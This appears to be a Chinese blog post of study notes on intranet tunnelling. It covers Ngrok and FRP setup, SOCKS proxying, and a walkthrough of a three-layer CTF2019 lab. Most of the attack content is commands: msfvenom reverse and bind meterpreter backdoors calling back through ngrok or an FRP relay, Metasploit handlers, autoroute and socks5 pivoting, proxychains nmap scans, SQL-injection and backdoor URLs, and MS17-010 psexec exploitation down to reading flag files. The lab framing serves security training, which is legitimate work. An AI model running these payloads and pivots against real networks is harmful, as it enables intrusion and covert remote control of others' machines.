0
点赞
收藏
分享

微信扫一扫

内网安全-隧道穿透漫游(二)

WikongGuan 2022-04-17 阅读 101

Sock代理常用工具:Sockscap&Proxifier&Proxychains

目标:旨在代理连接肉鸡后实现本地渗透肉鸡网络架构。

Linux:Proxychains

Windows:Sockscap Proxifier

穿透平台:Ngrok Frp Nps(麻烦)

优点:穿透加密数据,中间平台,防追踪,解决网络问题

实验环境:两个不同的内网(有网络)实现穿透控制。

Ngrok使用流程:

1.注册-购买-填写-确认http://www.ngrok.cc/

协议:http 本地端口:192.168.46.131:80

2.测试:内网1执行后门-免费主机处理-内网2监听-内网2接受器

./sunny clientid 7e543d3efc295766 //控制端连接Ngrok的服务器

msfvenom -p windows/meterpreter/reverse_http lhost=xxxx.free.idcfengye.com lport=80 -f exe -o test.exe

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost 192.168.46.131

set lport 80

exploit

FRP简述:自行搭建,方便修改,成本低,使用多样化。

FRP使用流程:

1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)

服务器修改配置文件frps.ini:

[common]

bind_port = 7000

启动服务端:

./frps -c ./frps.ini

2.控制端-下载-解压-修改-启动

控制端修改配置文件frpc.ini:

[common]

server_addr = 47.94.236.117

server_port = 7000 #frpc工作端口,必须和上面frps保持一致

[msf]

type = tcp

local_ip = 127.0.0.1

local_port = 5555 #转发给本机的5555

remote_port = 6000 #服务端用6000端口转发给本机

启动客户端:

 ./frpc -c ./frpc.ini

msfvenom -p windows/meterpreter/reverse_tcp lhost=your_ip lport=6000 -f exe -o frp.exe

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 127.0.0.1

set LPORT 5555

exploit

CFS三层内网漫游演练测评-某CTF2019

Target1:

探针目标-利用WEB漏洞(TP5_RCE)-获取webshell权限-获取Flag-Target2

1.生成后门:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.46.131 LPORT=1111 -f elf >t1.elf

2.接受反弹:

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set LHOST 192.168.46.131

set LPORT 1111

exploit

3.信息收集及配置访问

获取网络接口:run get_local_subnets

查看路由地址:run autoroute -p

添加路由地址:run autoroute -s 192.168.22.0/24

开启本地代理:(创建SOCK5协议代理)

use auxiliary/server/socks5

set srvport 2222

exploit

4.利用本地代理接口访问测试

设置浏览器代理进行访问测试

linux:

配置proxychains后调用工具探针Target2

/etc/proxychains.conf

socks5 192.168.46.131 2222

proxychains nmap -sT -Pn 192.168.22.0/24 -p80

-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护。

-sT:扫描TCP数据包已建立的连接connect

windows:

利用代理工具Proxifier或SocksCap64载入代理进行进程访问测试

Target2:

探针目标-利用WEB漏洞(SQL注入)-后台获取webshell权限-获取Flag-Target3

http://192.168.22.128/index.php?r=vul&keyword=1 #sql注入

http://192.168.22.128/index.php?r=admini/public/login #后台

http://192.168.22.128/index.php?r=special #后门shell

1.生成正向后门:

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf

2.访问接受:

use exploit/multi/handler

set payload linux/x64/meterpreter/bind_tcp

set rhost 192.168.22.128

set LPORT 3333

exploit

3.信息收集及配置访问

获取网络接口:run get_local_subnets

查看路由地址:run autoroute -p

添加路由地址:run autoroute -s 192.168.33.0/24

Target3:

探针目标-端口及漏洞扫描-利用MS17010获取系统权限-获取Flag-GG

proxychains nmap -Pn -sT 192.168.33.33

use auxiliary/scanner/smb/smb_ms17_010 //判断漏洞

use exploit/windows/smb/ms17_010_psexec //验证漏洞

set payload windows/meterpreter/bind_tcp //正向连接

set RHOSTS 192.168.33.33 //攻击目标

set RHOST 192.168.33.33 //连接目标

exploit

shell

dir /S flag.txt /B

type C:\Users\Administrator\Desktop\flag.txt

思维导图补充:内网-信息收集&不出网上线CS&正反向&端口转发 - 完全免费的思维导图软件 - 知犀官网知犀官网在线思维导图工具提供:思维导图在线制作,并提供思维导图文件大纲、分享、下载、云存储等实用功能。icon-default.png?t=M3C8https://www.zhixi.com/view/bd6fcf39

举报

相关推荐

0 条评论